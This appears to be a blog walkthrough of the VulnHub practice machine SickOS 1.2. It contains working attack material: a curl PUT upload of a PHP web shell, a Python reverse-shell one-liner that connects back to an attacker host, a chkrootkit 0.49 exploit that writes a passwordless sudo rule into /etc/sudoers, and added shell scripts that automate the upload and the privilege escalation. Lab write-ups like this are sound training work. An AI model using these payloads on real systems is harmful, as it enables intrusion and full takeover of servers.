SickOS 1.2 is another vulnerable machine from VulnHub and can be downloaded here: https://www.vulnhub.com/entry/sickos-12,144/

To start off I had to use nmap again to find the machine's IP address, since netdiscover did not find it. First we run nmap to see which ports are open:

So we have ports 22 and 80 open; let's see what is on the web page.

Another odd web page. There is nothing interesting in the source code either:

<html>

<img src="blow.jpg">

</html>

So let's run dirb to find some directories, and nikto as well.

root@pentest:~# dirb http://192.168.229.131 /usr/share/dirb/wordlists/big.txt 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Thu Jan 16 18:43:19 2020
URL_BASE: http://192.168.229.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458                                                         
---- Scanning URL: http://192.168.229.131/ ----
==> DIRECTORY: http://192.168.229.131/test/                                                                                                                                           
+ http://192.168.229.131/~sys~ (CODE:403|SIZE:345)                                                                                                                                                                                                                                                                                                          
---- Entering directory: http://192.168.229.131/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)                                                                    
-----------------
END_TIME: Thu Jan 16 18:44:01 2020
DOWNLOADED: 20458 - FOUND: 1

One directory, test, and it is empty, so nothing interesting there. Let's have a look at the nikto results:

root@pentest:~# nikto -host http://192.168.229.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.229.131
+ Target Hostname:    192.168.229.131
+ Target Port:        80
+ Start Time:         2020-01-16 18:40:17 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ 26545 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2020-01-16 18:41:28 (GMT1) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing interesting here either. After some searching I found the idea of using curl (an OPTIONS request) to see which HTTP methods the server allows, since an allowed method such as PUT or DELETE can be misused. An interesting read on dangerous HTTP methods (PDF from SANS): Link

Here we see that we can use the PUT method to upload files. But how do we do this? Let's google: https://stackoverflow.com/questions/5143915/test-file-upload-using-http-put-method/49730009. It doesn't seem too hard; we can use curl http://myservice --upload-file file.txt

Kali ships a few PHP web shells under /usr/share/webshells/php/ (simple-backdoor.php, php-reverse-shell.php and others); I always find them with locate webshell. The one I want first is /usr/share/webshells/php/php-reverse-shell.php. Let's copy it with cp /usr/share/webshells/php/php-reverse-shell.php ~

Let's read the reverse shell and edit what needs editing: the IP has to be changed to the IP of our Kali machine; the port can stay. It looks like the following:

Uploading it with the command above did not work. Let's try the other variants from the Stack Overflow answer.

Those did not work either, with the same error. Oddly, I can upload an empty text file, but not a file with content in it. One common cause when a small PUT succeeds but a larger one fails, worth comparing against the actual error: curl adds an Expect: 100-continue header to request bodies above a size threshold, and a server that does not implement it answers 417 Expectation Failed; passing -H 'Expect:' tells curl not to send that header.

After some fiddling, the following worked:

curl -X PUT -d '<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>' http://192.168.229.131/test/shell.php

Let's open the web shell. Requesting http://192.168.229.131/test/shell.php?cmd=command executes the command. Note how the payload above is quoted: the single quotes around cmd inside $_REQUEST['cmd'] close and reopen the shell's single-quoted string, so PHP actually receives $_REQUEST[cmd]; PHP 5 treats the bare word as the string 'cmd' (raising a notice), which is why it still works. Let's have a look around and see what we can find:

# http://192.168.229.131/test/shell.php?cmd=uname -a
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux

# http://192.168.229.131/test/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# http://192.168.229.131/test/shell.php?cmd=cat%20../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

# http://192.168.229.131/test/shell.php?cmd=python%20-h
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Options and arguments (and corresponding environment variables):
--snip--
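The method check, the upload and the command execution above, collected into one script as an added example; this is not the write-up's own code. The target URL, the /test/ directory, the shell filename and the Allow value used in the comments are assumptions taken from this lab, and nothing touches the network unless RUN=1 is set.

```shell
#!/bin/sh
# Added example (not from the original write-up): enumerate HTTP methods with
# OPTIONS, PUT a PHP web shell, and run commands through it.
# Assumed lab values: target and upload directory from the write-up.
TARGET="${TARGET:-http://192.168.229.131}"
UPLOAD_DIR="${UPLOAD_DIR:-/test/}"

# Methods that let a client create, change or delete server-side content.
DANGEROUS="PUT DELETE MOVE COPY PROPPATCH MKCOL"

# parse_allow RESPONSE: print the value of the Allow header from a raw HTTP
# response (as returned by curl -i); prints nothing if the header is absent.
parse_allow() {
    printf '%s\n' "$1" | tr -d '\r' |
        awk 'tolower($0) ~ /^allow:/ { sub(/^[^:]*: */, ""); print; exit }'
}

# dangerous_methods "GET, HEAD, PUT": print the space-separated subset of an
# Allow value that can modify the document root, in the order advertised.
dangerous_methods() {
    found=""
    for m in $(printf '%s' "$1" | tr ',' ' '); do
        case " $DANGEROUS " in
            *" $m "*) found="$found $m" ;;
        esac
    done
    printf '%s\n' "${found# }"
}

# allowed_methods URL: ask the server with OPTIONS and return the Allow value.
allowed_methods() {
    parse_allow "$(curl -s -i -X OPTIONS "$1")"
}

# put_file URL FILE: upload FILE with PUT and print only the HTTP status.
# -H 'Expect:' stops curl from sending "Expect: 100-continue" for larger
# bodies, which servers lacking 100-continue support answer with 417.
put_file() {
    curl -s -o /dev/null -w '%{http_code}' -X PUT -H 'Expect:' \
         --data-binary @"$2" "$1"
}

# webshell_cmd URL CMD: run CMD through a simple-backdoor style shell at URL.
# -G with --data-urlencode puts the command in the query string properly
# encoded, so spaces, quotes and semicolons arrive intact.
webshell_cmd() {
    curl -s -G --data-urlencode "cmd=$2" "$1"
}

# webshell_source: the same one-line shell as the write-up's PUT payload,
# with double-quoted array keys so it survives shell single quotes.
webshell_source() {
    printf '%s\n' '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>'
}

# Only talk to the target when asked for explicitly: RUN=1 sh upload.sh
if [ "${RUN:-0}" = 1 ]; then
    allow=$(allowed_methods "$TARGET$UPLOAD_DIR")
    echo "Allow: $allow"
    bad=$(dangerous_methods "$allow")
    [ -n "$bad" ] || { echo "no content-modifying methods advertised"; exit 1; }
    echo "dangerous: $bad"
    tmp=$(mktemp)
    webshell_source > "$tmp"
    echo "PUT status: $(put_file "$TARGET${UPLOAD_DIR}shell.php" "$tmp")"
    rm -f "$tmp"
    webshell_cmd "$TARGET${UPLOAD_DIR}shell.php" "id; uname -a"
fi
```

The two curl details that most often bite here are the -H 'Expect:' on the PUT and the -G --data-urlencode on the command: the first avoids a 417 from servers that do not implement 100-continue, the second makes a payload full of quotes, semicolons and spaces (such as a Python reverse-shell one-liner) reach the web shell unchanged.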

We can use Python to create a reverse shell, since this web shell is painful to work with. I always use this cheat sheet for easy reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

We can use the following one-liner, sent through the web shell's cmd parameter, to make a reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.229.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But first we need a listener on port 1234, which we can do with nc -lvp 1234. Let's try... FAILED. Let's try again with a better port: outbound connections on arbitrary ports may well be filtered, while 443 is almost always allowed out, and the web server here is not using it. With the port changed to 443 in both the one-liner and the listener, we got a reverse connection:

It is a non-interactive shell. I searched for ways to upgrade it and the following worked: python -c 'import pty;pty.spawn("/bin/bash")'. Now we have a more or less normal shell, which is easier to work with. Let's look around for a privilege escalation.

To help with the privilege escalation I wanted to try a script for the first time: unix-privesc-check. To transfer it we can copy it to /var/www/html and start Apache with service apache2 start, then download it on the target with wget http://192.168.229.129/upc.sh

For some reason it does not download, and git is not available either. Given that the reverse shell only connected back on 443, outbound port 80 is probably blocked as well, so serving the file on port 443 would be the thing to try next. Let's just search manually as usual. Some interesting information:
– John is in the sudoers group

After looking around for a while I found that chkrootkit was installed (it has a cron.daily script). I checked its version: 0.49, which seems old.
www-data@ubuntu:/etc/cron.daily$ chkrootkit -V

There is an exploit for it, Exploit-DB 33899:

Contents of 33899.txt

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.

So to reproduce this we have to put an executable file named update in /tmp, which chkrootkit will run as root. Let's make one. After some searching, my first idea was to change root's password with: echo -e "test\ntest" | passwd

So let's write that into update with echo 'echo -e "test\ntest" | passwd' > update and make it executable; I simply used chmod 777 update. Wait a couple of minutes and see whether we can SSH in as root. This did not work; the password was not changed. There are two reasons: passwd reads the new password from the controlling terminal rather than from stdin, so the pipe is ignored (chpasswd is the tool that reads user:password pairs from stdin), and /bin/sh on Ubuntu is dash, whose echo does not understand -e and prints it literally. After more searching I put the following into the update file instead: echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > update

This appends a passwordless sudo rule for www-data to /etc/sudoers. The final chmod 440 matters: sudo refuses to use a sudoers file that is writable by others. Once chkrootkit has run the file, we can switch to root with sudo.
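The privilege escalation above as one script, added here as an example and not part of the original write-up: it reads the chkrootkit version, checks it against the affected range (0.49 and older, Exploit-DB 33899, CVE-2014-0476) and drops the /tmp/update payload. The "chkrootkit version 0.49" banner format of chkrootkit -V, the password "test", the exact sudoers line and /tmp not being mounted noexec are assumptions. Nothing is written to /tmp unless DEPLOY=1 is set.

```shell
#!/bin/sh
# Added example, not code from the original write-up: check the installed
# chkrootkit version, then drop the /tmp/update payload that chkrootkit
# <= 0.49 (Exploit-DB 33899, CVE-2014-0476) executes as root.
# Assumptions: the "chkrootkit version X.YY" banner of chkrootkit -V, the
# password "test", and /tmp not being mounted noexec.

# version_from_banner BANNER: extract "0.49" from "chkrootkit version 0.49".
version_from_banner() {
    printf '%s\n' "$1" | awk '/version/ { print $NF; exit }'
}

# chkrootkit_vulnerable VERSION: succeed (exit 0) for 0.49 and older.
chkrootkit_vulnerable() {
    major=${1%%.*}
    minor=${1#*.}
    minor=${minor%%.*}
    [ "$major" -eq 0 ] && [ "$minor" -le 49 ]
}

# write_update_payload DIR [MODE]: create DIR/update, executable and with a
# shebang so it runs under sh however chkrootkit invokes it.
#   sudoers  - the route that worked in the write-up: a NOPASSWD rule for
#              www-data. No chmod 777 is needed: the script runs as root,
#              which bypasses file permissions, and a world-writable
#              /etc/sudoers makes sudo refuse it until the mode is 0440 again.
#   chpasswd - what the first attempt should have used: passwd reads the new
#              password from the controlling tty and ignores stdin, whereas
#              chpasswd reads user:password pairs from stdin. (The original
#              echo -e would also have printed "-e" literally under dash.)
write_update_payload() {
    dir=$1
    mode=${2:-sudoers}
    case $mode in
        sudoers)
            cat > "$dir/update" <<'EOF'
#!/bin/sh
echo 'www-data ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
EOF
            ;;
        chpasswd)
            cat > "$dir/update" <<'EOF'
#!/bin/sh
echo 'root:test' | chpasswd
EOF
            ;;
        *)
            echo "unknown mode: $mode" >&2
            return 2
            ;;
    esac
    chmod 755 "$dir/update"
}

# Only act on a real target when asked for explicitly: DEPLOY=1 sh privesc.sh
if [ "${DEPLOY:-0}" = 1 ]; then
    v=$(version_from_banner "$(chkrootkit -V 2>&1)")
    if chkrootkit_vulnerable "$v"; then
        write_update_payload /tmp sudoers
        echo "planted /tmp/update for chkrootkit $v; after its next run: sudo -i"
    else
        echo "chkrootkit $v is not in the affected range" >&2
        exit 1
    fi
fi
```

After chkrootkit's next run (cron.daily, or sooner if the box runs it more often), sudo -i or sudo su gives a root shell; the chpasswd variant instead lets you SSH in as root with the chosen password, which is what the first attempt in the write-up was aiming for.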

Let's cat the flag to finish this machine:
